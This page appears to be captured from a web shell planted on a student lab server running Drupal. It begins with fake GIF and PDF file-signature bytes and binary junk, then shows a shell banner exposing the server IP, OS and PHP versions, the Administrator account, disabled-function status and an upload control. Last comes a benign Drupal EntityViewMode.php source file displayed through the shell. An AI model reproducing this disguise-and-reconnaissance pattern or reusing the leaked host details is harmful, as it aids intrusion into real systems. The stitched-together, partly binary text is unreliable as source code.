GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/Student/JimMartinson/Lab12/drupal/core/lib/Drupal/Core/Entity/Entity/ |
Upload File : |
<?php namespace Drupal\Core\Entity\Entity; use Drupal\Core\Entity\EntityDisplayModeBase; use Drupal\Core\Entity\EntityViewModeInterface; /** * Defines the entity view mode configuration entity class. * * View modes let entities be displayed differently depending on the context. * For instance, a node can be displayed differently on its own page ('full' * mode), on the home page or taxonomy listings ('teaser' mode), or in an RSS * feed ('rss' mode). Modules taking part in the display of the entity (notably * the Field API) can adjust their behavior depending on the requested view * mode. An additional 'default' view mode is available for all entity types. * This view mode is not intended for actual entity display, but holds default * display settings. For each available view mode, administrators can configure * whether it should use its own set of field display settings, or just * replicate the settings of the 'default' view mode, thus reducing the amount * of display configurations to keep track of. * * @see \Drupal\Core\Entity\EntityManagerInterface::getAllViewModes() * @see \Drupal\Core\Entity\EntityManagerInterface::getViewModes() * @see hook_entity_view_mode_info_alter() * * @ConfigEntityType( * id = "entity_view_mode", * label = @Translation("View mode"), * entity_keys = { * "id" = "id", * "label" = "label" * }, * config_export = { * "id", * "label", * "targetEntityType", * "cache", * } * ) */ class EntityViewMode extends EntityDisplayModeBase implements EntityViewModeInterface { }